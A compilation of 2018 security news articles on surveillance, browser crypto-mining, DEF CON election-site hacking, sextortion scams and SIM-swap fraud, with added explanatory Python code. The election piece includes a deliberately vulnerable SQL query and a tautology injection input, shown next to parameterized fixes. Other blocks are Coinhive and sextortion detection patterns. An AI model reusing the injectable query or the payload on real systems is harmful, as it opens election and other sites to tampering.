STE WILLIAMS

Sacramento admits to tracking welfare recipients’ license plates

As the American Civil Liberties Union (ACLU) found out in 2015 through the Freedom of Information Act, the US Drug Enforcement Administration (DEA) has for years been building a massive national license plate reader (LPR) database that it shares with federal and local authorities, with no clarity on whether courts are overseeing its use.

That blasé approach to mass surveillance of drivers is holding steady, as evidenced by recent revelations about California using an LPR database to track down welfare cheats.

It’s doing so in a manner that’s against the law. As the Electronic Frontier Foundation (EFF) noted when it revealed the surveillance two weeks ago, “California law is crystal clear” on this: any entity – including government agencies such as those that administer welfare programs – that accesses data collected by automated license plate readers (ALPRs) must implement a privacy and usage policy that ensures that use of this sensitive information “is consistent with respect for individuals’ privacy and civil liberties.”

ALPRs snap photos of all license plates from street poles and police cars as vehicles drive by. To legally get at those images, the Sacramento County Department of Human Assistance (DHA) should have had a policy that includes periodic audits. Also, each time that LPR data was looked up, a purpose should have been recorded.

But for the two years preceding the EFF’s California Public Records Act request, the DHA didn’t tick off those two basic legal requirements – or if they did, it didn’t show up in the logs seen by the EFF.

In fact, between June 2016 and July 2018, 22 employees working on welfare fraud searched ALPR data more than 1,000 times – all without privacy policies posted online or written anywhere, as required by law. Some employees only dipped a toe into the database, running a single search, while others ran more than 100 searches. One employee ran 214 searches over the course of 20 months, the EFF found.

There were no audits for any of this data access. The EFF also couldn’t find that the reasons for the ALPR data searches were recorded, although the DHA claims that they were.

DHA Director Ann Edwards told the Sacramento Bee that the county’s welfare fraud investigators use the ALPR data to find suspects and collect evidence to prove cases of fraud. She said that the decision to use such data is determined on a case-by-case basis “depending on the investigative needs of the case.”

It was also done without a clue that the agency needed a policy before employees could legally access that data. The DHA claims that it had no idea that a policy, plus a log of reasons for access, plus monthly audits, are required.

The EFF said that the agency spent a week playing catch-up after the civil liberties group asked about the issue, whipping together a privacy policy and posting it to its website. The new policy includes a monthly audit process.

The DHA didn’t collect the data in question itself. Rather, it paid for it. According to contracts and invoices obtained by the EFF, Sacramento County paid more than $10,000 – about $5,000 per year – for access to data held by a vendor called Vigilant Solutions. Those contracts were signed without going through the competitive bidding process, the EFF notes.

Vigilant is the leading vendor of LPR data. As of 2016, the Atlantic reported that Vigilant had amassed roughly 2.2 billion license-plate photos and was capturing and permanently storing about 80 million additional geotagged images per month.

Vigilant’s dataset has continued to burgeon. In February 2018, news emerged that the LPR vendor would be providing the Department of Homeland Security’s (DHS’s) Immigration and Customs Enforcement (ICE) arm with agency-wide access to its nationwide database, to enable ICE to track license plates across the country. That gives ICE access to billions of license plate records and new powers of real-time location tracking: a profound source of concern to civil libertarians.

Vigilant doesn’t necessarily collect all the data itself. Rather, it acquires data from partners such as car repo agencies and other private groups. Vigilant also partners with police departments, picking up yet more data from camera-equipped police cars.

At the time of ICE gaining access to the data, Jay Stanley, a senior policy analyst who studies LPRs with the ACLU, said that the biggest concern for civil libertarians is the scale of Vigilant’s network, which it’s put together almost completely outside of public accountability:

If ICE were to propose a system that would do what Vigilant does, there would be a huge privacy uproar, and I don’t think Congress would approve it. But because it’s a private contract, they can sidestep that process.

Besides signing those $10,000+ worth of contracts with Vigilant, Sacramento’s DHA also signed an agreement forbidding it from talking to the media about the ALPR program without Vigilant Solutions’ written permission. It also agreed not to use information about Vigilant Solutions in “any manner that is disparaging.”

Why is it even necessary to investigate welfare fraud to this extent?

DHA officials acknowledged in 2013 that “the percentage of fraud cases is statistically low.” In 2012, DHA found fraud in only 0.02% of all welfare cases, or 6.25% of all fraud referrals. It works out to 500 of some 8,000 fraud referrals (out of nearly 200,000 people receiving assistance in Sacramento).

Granted, of late, the DHA has noted higher welfare fraud rates, which includes things such as failing to report income or claiming care for a child who doesn’t actually live with the recipient. The DHA told the Sacramento Bee that since June 2016, when the county first started using ALPR data, its investigators discovered fraud in about 13,000 of the 35,412 fraud referrals they investigated: about 37% of the cases.

Edwards told the Sacramento Bee that the DHA’s investigators are using ALPR data about 2.5% of the time: not heavy usage at all, she said:

It doesn’t appear to be overused. I think we use it very judiciously and only when needed to investigate fraud.

She also said that DHA is already following other parts of California’s privacy law (a law that was passed at the beginning of 2016, near the time the agency started using the ALPR data), including employees justifying their use of the data.

Each time a criminal investigator accesses the information, they… must document the reason why the data is being requested from the system.

As far as the monthly audits go, Edwards told the Sacramento Bee that they would start last week and would happen every two months:

We will be doing a random sampling of times [ALPR data] has been used in the past, in order to confirm that it hasn’t been used inappropriately. If we find as a result of our review that it was used inappropriately, disciplinary action could be taken.

Or hey, how about this instead, suggested EFF investigator Dave Maass: stop using the data immediately and do an investigation of the DHA’s past use. That’s the only way to figure out what welfare fraud investigators were really searching for, he told the Sacramento Bee. For all we know DHA employees could have been doing anything from…

Investigating a major fraud case to spying on their ex-spouses. Were they looking up people in Texas, people on the other side of the country? We just don’t know.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/MZ8Ppx-8z-U/

Making money mining Coinhive? Yeah, you and nine other people

Mining internet currency on websites with Coinhive scripts is a lucrative endeavor, but only for a handful of people.

This according to researchers from RWTH Aachen University, who used a new detection technique to track pages mining the cryptocurrency and found that [PDF] just 10 users were responsible for 85 per cent of the links that the Coinhive service uses to mine about $250,000 worth of Monero currency every month.

In other words, it’s nice work if you can get it. And you can’t get it.

The Aachen U group of Jan Rüth, Torsten Zimmermann, Konrad Wolsing, and Oliver Hohlfeld crawled the Alexa top one million websites and the full .org domain to gather and fingerprint the Coinhive scripts embedded on pages, linking the mining activity on each page to a Coinhive account.

Typically, a Coinhive user will embed the code (ethically or otherwise) into high-traffic web pages. Visitors to the page then execute the JavaScript to perform the calculations needed to mine blocks that create new Monero. Coinhive then takes a 30 per cent cut of the payout and gives the rest to the user.

Because the Coinhive user spreading the code has to include their account token in the script in order to get paid, the researchers were able to measure who is most active in spreading the Coinhive code via shortened links.

What they found was an extremely top-heavy system where only a few people reaped most of the profits.

“We observe a power-law which highlights the existence of few heavy users that created a large number of links,” the researchers said.

“In fact, 1/3 of all links are contributed by a single user only and roughly 85 per cent of all links are created by only 10 users. Of course, a single user could use multiple tokens, however, this would only emphasize our current observations.”
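The measurement the researchers describe rests on two steps: spot the pages that embed the Coinhive miner, then group them by the account token in the embed so that one account's share of all mining pages can be computed. The Python below is an added illustration of that approach, not the Aachen group's code or their WebAssembly fingerprint; it matches only the plain, unobfuscated embed pattern (a script tag loading coinhive.min.js and a `new CoinHive.Anonymous('<site-key>')` call), which is an assumption about how the public Coinhive snippet looked, and runs over a small constructed set of pages to produce the same kind of concentration figures quoted above.

```python
import re
from collections import Counter

# Site key passed to the Coinhive miner constructor in the public embed snippet,
# e.g. new CoinHive.Anonymous('<site-key>'). The key length and quoting are
# assumptions for this example; real deployments vary and may be obfuscated.
COINHIVE_KEY_RE = re.compile(
    r"CoinHive\.(?:Anonymous|User)\s*\(\s*['\"]([A-Za-z0-9]{16,64})['\"]"
)
# Script tag loading the miner library (assumed path, matched case-insensitively).
COINHIVE_SCRIPT_RE = re.compile(r"<script[^>]+src=['\"][^'\"]*coinhive\.min\.js", re.I)


def extract_site_key(html):
    """Return the Coinhive site key embedded in the page, or None."""
    m = COINHIVE_KEY_RE.search(html)
    return m.group(1) if m else None


def is_mining_page(html):
    """True if the page loads the miner library or instantiates the miner."""
    return bool(COINHIVE_SCRIPT_RE.search(html) or COINHIVE_KEY_RE.search(html))


def survey(pages):
    """pages: dict hostname -> html. Returns (list of mining hosts, Counter of site keys)."""
    keys = Counter()
    mining = []
    for host, html in pages.items():
        if not is_mining_page(html):
            continue
        mining.append(host)
        key = extract_site_key(html)
        if key:
            keys[key] += 1
    return mining, keys


def concentration(key_counts, top_n=10):
    """Share of mining pages attributed to the single largest key, and to the top_n keys."""
    total = sum(key_counts.values())
    if total == 0:
        return 0.0, 0.0
    ranked = sorted(key_counts.values(), reverse=True)
    return ranked[0] / total, sum(ranked[:top_n]) / total


# Constructed sample crawl: 10 mining pages spread over 4 site keys, plus 2 clean pages.
_SAMPLE_KEYS = (
    ["AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"] * 6
    + ["BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"] * 2
    + ["CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC", "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"]
)
SAMPLE_PAGES = {}
for _i, _key in enumerate(_SAMPLE_KEYS):
    SAMPLE_PAGES[f"site{_i}.example"] = (
        "<html><head><script src='https://coinhive.com/lib/coinhive.min.js'></script></head>"
        f"<body><script>var miner = new CoinHive.Anonymous('{_key}'); miner.start();"
        "</script></body></html>"
    )
SAMPLE_PAGES["clean.example"] = "<html><body><p>No miner here.</p></body></html>"
SAMPLE_PAGES["blog.example"] = "<html><body><script src='/static/app.js'></script></body></html>"


if __name__ == "__main__":
    hosts, counts = survey(SAMPLE_PAGES)
    single, top10 = concentration(counts)
    print(f"{len(hosts)} of {len(SAMPLE_PAGES)} pages mine; {len(counts)} distinct site keys")
    print(f"largest key: {single:.0%} of mining pages; top 10 keys: {top10:.0%}")
```

On the constructed sample the largest key accounts for 60% of mining pages; with only four keys in play the top-10 share is trivially 100%, which is why the researchers' 85% figure is only meaningful against their much larger crawl. A real survey would also need to follow the shortened links the article mentions and detect obfuscated loaders, which is where the paper's WebAssembly fingerprinting comes in.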

Peanuts for CPU cycles

The researchers are not the first people to find this out. Earlier this year, a Japanese man cuffed for illegally spreading the Coinhive code said he only managed to make around 5,000 Yen, or $45, from the scheme.


To be fair, the researchers also note that there simply aren’t that many sites actually using Coinhive. They estimate that just 0.08 per cent of the sites they probed in the study were actually serving the browser mining code, and Coinhive itself only accounts for around 1.18 per cent of all Monero mining.

“While probably profitable for Coinhive, it remains questionable whether mining is a feasible alternative to ads,” the researchers note.

Although the figures found in the study are interesting, the researchers say it is their fingerprint detection method that could be the most valuable product of the work. They note that the method could be incorporated by blocklists that are currently unable to detect and filter out many of the shortened links used to redirect users to unauthorized mining pages.

“For its detection, we find the public NoCoin filter list to be insufficient to broadly detect browser mining,” the researchers conclude.

“We thus present a new technique based on WebAssembly fingerprinting to identify miners, up to 82 per cent of thereby identified mining websites are not detected by block lists.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/15/coinhive_mining_money/

Mozilla-endorsed security plug-in accused of tracking users

A security plug-in for the Firefox browser is under fire after users discovered it was collecting and uploading their online activity.

The outcry began after Mozilla featured the Web Security extension on its blog with a post titled “Make Your Firefox Browser a Privacy Superpower.” The plug-in, developed by German company Creative Software Solutions, bills itself as a tool for blocking malicious pages and phishing sites.


It also, allegedly, logs what web pages the user visits. Shortly after the post went up, uBlock Origin developer Raymond Hill noticed that the plug-in was gathering and transmitting the address of visited websites to a server in Germany.

Word got back to Mozilla, and the org moved to strike the link to Web Security from its blog and investigate the matter.

“We’ve received concerns from the community about the Web Security extension, and are currently investigating those concerns,” a Mozilla spokesperson told The Register.

“The reference to the extension has been removed from the blog post as part of the investigative process.”

El Reg reached out to Creative Software Solutions, whose managing director Fabian Simon says that the collection of browsing information is only done to check a site against Web Security’s global blacklist.

“This is a necessary step to assure the functionality of the add-on and has nothing to do with tracking the user’s browser behavior, thus these reports only showed a part of how the add-on works to protect the user,” Simon explained.

“We take privacy very important and do not use this server communication for tracking the user’s browsing history.”

Simon says his company does not know why Mozilla pulled the link to Web Security, but Creative plans to submit an updated version of the extension for review, to prove that everything is on the level.

“I am sure that if they look into the issue they will see that this is a normal and necessary behavior,” he said. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/15/mozilla_security_plugin/

Election Websites, Back-End Systems Most at Risk of Cyberattack in Midterms

Both adult and kid hackers demonstrated at DEF CON how the hackable voting machine may be the least of our worries in the 2018 elections.

Two 11-year-old budding hackers last week at DEF CON in Las Vegas used SQL injection attack code to break into a replica of the Florida Secretary of State’s website within 15 minutes, altering vote count reports on the site.

Meanwhile, further down the hall in the adult Voting Machine Hacking Village at Caesars Palace, one unidentified hacker spent four hours trying to break into a replica database that housed the real, publicly available state of Ohio voter registration roll. He got as far as the secured server — penetrating two layers of firewalls with a Kali Linux pen testing tool — but in the end was unable to grab the data from the database, which included names and birthdates of registered voters.

“He got to the secure file server but didn’t know how to write the query to pull the data out,” says Alon Nachmany, solution engineer with Cyberbit, which ran the voter registration database simulation. That he got as close to the data as he did was no small feat, however.

“He got very far, but he didn’t have the skill needed to pull the file itself,” Nachmany says.

The setup, using Cyberbit’s training and simulation platform for cyber ranges, was designed to mimic a typical county election system — with a web application server on a DMZ behind a firewall and a secure file server sitting behind its own firewall — but was created more for a red-team training scenario, says Bash Kazi, a Cyberbit partner who built it. “We used a more sophisticated network and attack scenario that somebody would have to have much more training to hack,” he says.

While the election-office simulation challenge proved to be too much of one for most takers at the voting system hacking event, security experts say that these and other Web-based systems, such as states’ election-reporting websites and candidate websites, are the most likely (and easy) targets of attackers for the fall midterms.

That’s not to say voting machines are not easy marks: hackers successfully cracked into at least nine different machines in the Village this year, including voting machines, tablets, and e-pollbooks, with buffer overflows, stored passwords, and a lack of encryption, for example. It’s just simpler for a remote hacker such as a nation-state to penetrate a public-facing website to DDoS it, deface it, alter information (such as changing vote count data or polling place information), or access sensitive data stored on its back-end servers than to tamper with a voting machine.

DEF CON and Black Hat founder Jeff Moss says this year’s Village represented an evolution from pure voting machine hacking in 2017 to moving toward election systems and infrastructure. “We’re working from the edges,” Moss says.

“Last year was the big splash. We’re hoping now that the ‘oohs’ and ‘aahs’ are over, we can now start digging into” other more serious security flaws in election systems, he says. “There’s still work to be done.”

Jake Braun, co-founder and organizer of the DEF CON Voting Village, says including the kids’ portion of DEF CON, R00tz Asylum, in the voting and election hacking events wasn’t meant to be a “gotcha” moment. “The most vulnerable part [of the election system] are these websites,” he says. “The ultimate fake news is changing election results.”

Emmett Brewer, aka @p0wnyb0y, gave himself all of the vote counts, and then tweeted: “I think I won the Florida midterms.” He was first to crack the site, in 10 minutes, followed five minutes later by Audrey, who was able to change the vote counts on the Florida Division of Elections replica site. Brewer, Audrey, and other kid hackers in R00tz were given a handout on SQL injection and how to use it. 

The replica Secretary of State websites and software were set up by Aries Security, whose founder and CEO, Brian Markus, previously converted his Capture the Flag simulator for the US Department of Defense’s cybersecurity training operations.
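The flaw the R00tz participants were handed is the classic one in results-reporting sites: a page that takes a county name from the request and splices it straight into the SQL text, so the input can change the query instead of merely being compared against it. The Python below is an added illustration written for this article, not Aries Security's replica or any real state site; it uses an in-memory SQLite table with constructed vote counts and places the string-built query next to its hardened equivalents (a bound parameter, plus an allowlist check on the county name) so the difference in behaviour on a malformed input is visible.

```python
import sqlite3

# Constructed sample data standing in for an unofficial results-reporting table.
KNOWN_COUNTIES = {"Alachua", "Baker"}


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE results (county TEXT, candidate TEXT, votes INTEGER)")
    conn.executemany(
        "INSERT INTO results VALUES (?, ?, ?)",
        [
            ("Alachua", "Candidate A", 120),
            ("Alachua", "Candidate B", 80),
            ("Baker", "Candidate A", 40),
            ("Baker", "Candidate B", 60),
        ],
    )
    return conn


def results_vulnerable(conn, county):
    """String-built query: the request value becomes part of the SQL itself."""
    sql = f"SELECT county, candidate, votes FROM results WHERE county = '{county}'"
    return conn.execute(sql).fetchall()


def results_parameterized(conn, county):
    """Bound parameter: the request value is only ever compared as data."""
    return conn.execute(
        "SELECT county, candidate, votes FROM results WHERE county = ?", (county,)
    ).fetchall()


def is_known_county(county):
    """Allowlist check: reject anything that is not a county the site publishes."""
    return county in KNOWN_COUNTIES


def results_checked(conn, county):
    """Defence in depth: allowlist first, then a bound parameter."""
    if not is_known_county(county):
        raise ValueError(f"unknown county: {county!r}")
    return results_parameterized(conn, county)


if __name__ == "__main__":
    conn = make_db()
    ordinary = "Baker"
    # Textbook tautology input: in the string-built query it rewrites the WHERE clause.
    malformed = "' OR '1'='1"
    print("vulnerable, ordinary input:", results_vulnerable(conn, ordinary))
    print("vulnerable, malformed input:", results_vulnerable(conn, malformed))
    print("parameterized, malformed input:", results_parameterized(conn, malformed))
    print("allowlisted:", is_known_county(ordinary), is_known_county(malformed))
```

The string-built version returns every row for the malformed input because the quote closes the literal and the rest is parsed as SQL; the parameterized version returns nothing, since it looks for a county literally named `' OR '1'='1`. On a site whose database user also has write access, the same construction in an UPDATE path is how "changing a 3 to a 6" becomes possible, which is why the allowlist and read-only database credentials belong alongside parameter binding rather than instead of it.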

DEF CON Drama

But DEF CON wouldn’t be DEF CON without a bit of controversy: as the world’s largest hacker conference kicked off last week, the National Association of Secretaries of State (NASS) issued a public statement panning the Voting Village. “Our main concern with the approach taken by DEFCON is that it utilizes a pseudo environment which in no way replicates state election systems, networks or physical security. Providing conference attendees with unlimited physical access to voting machines, most of which are no longer in use, does not replicate accurate physical and cyber protections established by state and local governments before and on Election Day,” NASS said in its statement.

NASS also said allowing hackers to hack “mock” election office networks and voter registration databases isn’t realistic. “It would be extremely difficult to replicate these systems since many states utilize unique networks and custom-built databases with new and updated security protocols,” the association said.

But NASS didn’t dispute potential website weaknesses, adding that those sites only provide unofficial and “preliminary” results and have no physical or virtual link to vote-counting systems, so they can’t alter actual vote-count results.

Even so, experts say malicious hackers could wreak chaos and confusion and instill distrust of the election outcomes if they tamper with election-related websites in the run-up to the elections or on Election Day.

Website security analyst Jessica Ortega of SiteLock says website hacking is getting missed amid the wave of voting machine vulnerabilities. “People don’t realize what a weapon it can be,” she says. “It’s almost impossible to impact a legitimate vote count at scale, but you can sow distrust and chaos by defacing a polling place and associated websites, changing the address or phone number of polling places, and the unofficial results that get reported to the media. It’s easy to change a 3 to a 6” in a tally, for example, she says.

Ortega says few local municipalities have DDoS mitigation protections in place. “They don’t even have proper infrastructure for legitimate traffic,” she says, pointing to a recent special election where a county website went down for two hours merely due to high and legitimate traffic, not a DDoS attack.

Paul Gagliardi, former contractor for a US intelligence agency and currently a principal threat researcher at Security ScoreCard, says the entire election ecosystem must be secured, not just voting machines. Funding for state and local election IT is for the most part relatively low, and all about functionality first and security “as an afterthought,” he says. “Hopefully, that changes.”

But DEF CON organizer Braun and others concur that efforts to uncover and address security issues across the election infrastructure, as well as closer engagement between the security community and federal, state, and local officials, didn’t come soon enough for the midterms. “It’s going to be hard to do much for 2018. The goal is before 2020,” Braun says, including more federal funding for election security.

Cyberattacks in Progress

Meantime, Russian nation-state hackers and other potential attackers already have been targeting systems. California Secretary of State Alex Padilla, who headlined a panel at DEF CON, told Dark Reading attempts to attack state election systems “continues” and goes “up and down.”

Padilla said in his opening remarks that while he understood where his colleagues “were coming from” in the NASS statement given the pressures on them to uphold election integrity and security, the first he heard about the statement was when he arrived in Vegas. “We’re trying to strike the right balance of cybersecurity and integrity with confidence in the systems,” he said. “I’m here to listen and learn” from experts at DEF CON, he added.

Also on the panel with Padilla were Jeanette Manfra, US Department of Homeland Security assistant secretary of cybersecurity and communications; Noah Praetz, director of elections in Cook County, Ill.; Neal Kelley, chief of elections and registrar of voters for Orange County, Calif.; and Amber McReynolds, director of elections for the city and county of Denver, Colo.

Orange County’s Kelley reported activity similar to that in 2016. “We’re constantly seeing hits against our firewall: scans. So that level of activity continues like it was in 2016. We haven’t seen that decline,” he told Dark Reading. “Just the same level of standing as we were seeing” in 2016, he said.

Security experts say Russia and other attackers likely have been quietly attacking election systems for some time as part of their campaign to attempt to disrupt the US elections in some way. “I assume most of these things are already in progress,” says Gagliardi. “They don’t happen overnight. I’m confident we’ll see more” activity, he says.

DEF CON plans to publish a final report on all of the Voting Hacking Village findings.


Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise …

Article source: https://www.darkreading.com/vulnerabilities---threats/election-websites-back-end-systems-most-at-risk-of-cyberattack-in-midterms/d/d-id/1332554?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Beware! ‘Porn’ scam uses your phone number to blackmail you

Thanks to Brett Cove of SophosLabs for his behind-the-scenes work on this article.

Sextortion is back in the news.

That’s where someone tries to blackmail you by telling you to pay up or else they’ll reveal something truly personal about your sexuality or your sex life.

Typically, sextortionists claim to have infected your laptop or phone with malware while you were browsing, and then to have kept their eye on both your browsing habits and your webcam.

You can imagine the sort of data they claim to have sniffed out – and even if you know jolly well they couldn’t have got it from you, it still makes you wonder what they might claim you’ve been up to.

Last month, for example, we wrote about an ongoing sextortion scam campaign that tried to amplify your fear by throwing a genuine password of yours into the email.

I do know, [PASSWORD REDACTED], is your password. You do not know me and you are probably thinking why you are getting this e mail, correct? 

actually, I placed a malware on the adult videos (pornography) website and do you know what, you visited this web site to experience fun (you know what I mean). While you were watching videos, your internet browser initiated working as a RDP (Remote Desktop) that has a key logger which gave me accessibility to your display and also webcam. after that, my software program obtained all your contacts from your Messenger, Facebook, as well as email. 

The good news here is that the passwords revealed were old ones – typically from accounts that recipients had closed long ago, or where they’d already changed the password.

Even if you were still using the password they claimed to “know”, the crooks hadn’t acquired it by eavesdropping on you or hacking into your computer.

They’d bought or found a bunch of stolen data acquired in some breach or other, and were using it to try and convince you they really had hacked your device.

Well, these guys are back – or, more precisely, never went away, because we’ve seen bursts of this scam for many months already.

This time, the crooks seem to have got hold of a list that ties email addresses and phone numbers together, so they’re putting your phone number (or at least what they think is your phone number) into the email:

It seems that, +1-555-xxx-xx55, is your phone number. You may not know me and you are probably wondering why you are getting this e mail, right?

. . .

I backuped phone. All photo, video and contacts.

I created a double-screen video. 1st part shows the video you were watching (you've got a good taste haha . . .), and 2nd part shows the recording of your web cam.

exactly what should you do?

Well, in my opinion, [AMOUNT FROM $100-$1000 THIS TIME] is a fair price for our little secret. You'll make the payment by Bitcoin (if you do not know this, search "how to buy bitcoin" in Google).

In the 5000 or so samples we extracted from this week’s reports, the amount demanded varied from $100 to $1000 (last time we saw amounts up to $2900).

Interestingly, all the phone numbers had a similar North American format, with five digits Xed out; some Naked Security readers outside North America have reported receiving UK-style numbers with all but the last four digits Xed out.

We can only guess, but it looks as though the stolen data that the crooks acquired this time was pre-redacted – they’d be more convincing if they could reveal your entire number, after all.
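The campaign described above is recognisable from a handful of co-occurring traits: a partially Xed-out phone number (or, in the earlier wave, an old password) presented as proof, a dollar demand, a Bitcoin address to pay it to, and the same stock webcam/“little secret” phrasing. The Python below is an added example of turning those traits into a simple mail-filter rule; it is not SophosLabs code, the Bitcoin address in the sample is a constructed placeholder rather than one of the real addresses from the campaign, and the regexes are assumptions about the formats seen in the article (the North American `+1-555-xxx-xx55` style and the UK style with all but the last four digits Xed out), tuned only on the constructed samples here.

```python
import re

# A phone-number-like token that contains a run of X's: the pre-redacted numbers
# the crooks paste in as "proof". Assumed format, matched case-insensitively.
PHONE_REDACTED_RE = re.compile(r"\+?\d[\d\- ]*x{2,}[x\d\- ]*\d{2}", re.I)
# Legacy Base58 (1.../3...) or bech32 (bc1...) Bitcoin address shapes.
BTC_ADDR_RE = re.compile(r"\b(?:bc1[a-z0-9]{25,39}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})\b")
# A dollar figure in the range the article reports ($100-$1000) or thereabouts.
AMOUNT_RE = re.compile(r"\$\s?\d{2,5}\b")
# Stock phrasing from the sextortion template; two or more count as a hit.
LURE_PHRASES = (
    "webcam", "web cam", "double-screen", "little secret", "malware",
    "adult video", "pornography", "key logger", "keylogger", "bitcoin",
)


def score_sextortion(text):
    """Return a dict of indicator -> bool for one message body."""
    lowered = text.lower()
    return {
        "redacted_phone": bool(PHONE_REDACTED_RE.search(text)),
        "btc_address": bool(BTC_ADDR_RE.search(text)),
        "dollar_demand": bool(AMOUNT_RE.search(text)),
        "lure_phrases": sum(p in lowered for p in LURE_PHRASES) >= 2,
    }


def is_sextortion(text, min_hits=3):
    """Flag a message when at least min_hits independent indicators fire."""
    return sum(score_sextortion(text).values()) >= min_hits


# Constructed sample: the article's quoted template plus a placeholder address.
SCAM_SAMPLE = """It seems that, +1-555-xxx-xx55, is your phone number. You may not know me
and you are probably wondering why you are getting this e mail, right?
I created a double-screen video. 1st part shows the video you were watching,
and 2nd part shows the recording of your web cam.
Well, in my opinion, $700 is a fair price for our little secret.
You'll make the payment by Bitcoin to 1DemoAddressForTestingxxxxxxxxx
(if you do not know this, search "how to buy bitcoin" in Google)."""

# Constructed benign messages the rule must not flag.
BENIGN_SAMPLE = """Hi team, the Q3 budget review is moved to Thursday at 2pm.
Dial-in: +1-555-0100. Thanks."""
NEWSLETTER_SAMPLE = """Bitcoin closed at $6500 today; read our market analysis inside."""


if __name__ == "__main__":
    for name, body in (("scam", SCAM_SAMPLE), ("benign", BENIGN_SAMPLE),
                       ("newsletter", NEWSLETTER_SAMPLE)):
        print(name, score_sextortion(body), "->", is_sextortion(body))
```

Requiring several independent indicators is what keeps the newsletter that mentions Bitcoin and a dollar price out of the spam folder: it trips one indicator, the scam template trips all four. In a real deployment the address regex is also useful on its own for the kind of bookkeeping shown in the next section, pulling out the addresses so their payment history can be checked.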

Has anyone paid up?

When you try to track down Bitcoin payments, all you can tell is whether someone sent something to the Bitcoin addresses specified.

The 5000 samples from the past week that we used to dig into this latest email campaign each demanded payment into one of just three different Bitcoin addresses, which showed payment histories like this:

  Bitcoin address            BTC received   USD approx
  ------------------------   ------------   ----------
  1GYNxxxxxxxxxxxxxxxxxxLB    0.93094968       $6000
  19Gfxxxxxxxxxxxxxxxxxxai    0.04491935        $300
  1NQrxxxxxxxxxxxxxxxxxxrS    0.00047363          $3

  [BTC1 = $6500, roughly correct at 2018-08-15T16:00Z]

In case you’re wondering, there have been 20 payments into those three addresses, roughly distributed as follows:

   3 payments at $1000
   1 payment  at  $940
   1 payment  at  $780
   1 payment  at  $300
   1 payment  at  $210
   2 payments at  $200
   1 payment  at  $150
   1 payment  at  $100
   2 payments at   $90
   1 payment  at   $80
   1 payment  at   $10
   5 payments at    $1

Of course, we can’t tell whether any of the payments into these addresses came from victims of this scam – they could have come from anywhere, including from the crooks themselves.

What to do?

Regular Naked Security readers will know what we recommend in cases like this: DON’T PAY, DON’T PANIC, DON’T REPLY.

Even if the crooks had hacked your computer and recorded material you wish they hadn’t (it needn’t be porn, of course), why pay them not to reveal data that they already possess?

At least in a ransomware attack you are “paying for a positive” – you’re paying for a decryption key that will either work and do what you were hoping, or won’t work and that’s that.

But if you pay the crooks not to do something, they can just threaten to do it again next week, month, year…

…so it won’t get you anywhere, except to mark you out as someone who already knows how to buy and spend bitcoins.

Fortunately, in this case, the crooks don’t have any browsing logs or webcam footage at all, so it’s all just empty threats.

Hit [Delete] and you’re done with it – tell your friends.

Oh, and use this story to remind yourself, and to convince your boss, that any data breach can lead to ongoing trouble – even if the breach was “just” email addresses and phone numbers, and even if it happened long ago.

That’s the trouble with private data: once out, always out.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/MJmZPpn5OPw/

Google is tracking your location, even when the setting is turned off

Shock horror – it appears Google can track the location of anyone using some of its apps on Android or iPhone even when they’ve told it not to.

That’s according to an “exclusive” from the Associated Press (AP) which describes how researchers at Princeton University have confirmed that Google’s ability to record a user’s location history goes deeper than many realise.

Officially, Android users can turn off tracking using a slider button in the Location section under Settings.

Once deactivated, Google no longer stores a timeline and a precise record of a user’s movements when they take their Android device (or iPhone running Google services and apps) with them.

Checking this in Maps can be done by visiting Google’s Account Settings > My Account > Activity > Other Account Activity, then clicking ‘Visit Timeline’ under Location History. This should show a history of a user’s movements while using their device.

But according to AP’s research, turning off Location History doesn’t stop certain Google apps (Maps and Weather for instance) from storing a timestamped location when you open them.

Confusingly, this isn’t the same as Location Data, which uses a range of techniques (cell towers but especially Wi-Fi geolocation) to track where people are, sometimes to within a few metres.

It’s not clear how often this location polling happens, but it’s clearly more frequent, and therefore more precise, than the type of location data Google picks up when users occasionally open an app.

From the tests carried out by Princeton on AP’s behalf, the latter method can still generate enough data to record someone’s locations during a given period of days without necessarily making it clear how they moved between them.

AP quotes Princeton researcher, Jonathan Mayer:

If you’re going to allow users to turn off something called ‘Location History,’ then all the places where you maintain location history should be turned off. That seems like a pretty straightforward position to have.

Google’s answer to the accusation that it’s being overbearing in its desire to know the location of its users is that this can be paused under “Web and App Activity”.

As Google told AP in response to its findings:

There are a number of different ways that Google may use location to improve people’s experience, including: Location History, Web and App Activity, and through device-level Location Services.

It appears, then, Google draws a distinction between general high-accuracy location data and that collected less frequently by its apps. While this might be an anomaly from the way these have developed historically, Google’s failure to simplify location tracking will sound like a convenient oversight to privacy advocates.

In Google’s view, this is fine because it does inform users that apps can track their location even if those messages are hard to find or rarely encountered.

The most surprising aspect of this story is possibly that anyone is still surprised.

In 2017, a report from Quartz found that Android devices were still having their locations tracked via cell towers even after location history had been turned off, their SIM cards were removed and a factory reset had been initiated.

And it’s not just Google of course – numerous apps are at it, albeit after asking for permissions to do so. It’s not clear how many users decline or turn off location access for apps, but it’s likely to be a minority.

It’s a trade-off in the end. The usefulness of smartphones depends to some degree on navigation apps such as Maps, which require location data. Ditto apps that help to locate lost devices.

The bottom line is clear: if you own a smartphone, you can limit location tracking, but for now you can’t turn it off completely.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/JQIpOUN2xKQ/

Bitcoin backer sues AT&T for $240m over stolen cryptocurrency

A bitcoin investor is suing AT&T for $240m after it allegedly ported his phone number to a hacker, allowing the criminal to steal $24m in cryptocurrency.

Michael Terpin is suing the phone giant [PDF] for the value of the three million electronic coins plus $216m in punitive damages. He claims an AT&T employee at a store in Connecticut agreed, in person, to transfer his personal phone number to a new SIM card, despite the account having “high risk” protection following an earlier hacking effort.

The anonymous hacker then used control of Terpin’s phone number to bypass the security on his cryptocurrency accounts, which relied on two-factor authentication codes sent by text message, and transferred millions of dollars’ worth to a different account: an approach known as “SIM swap fraud.”

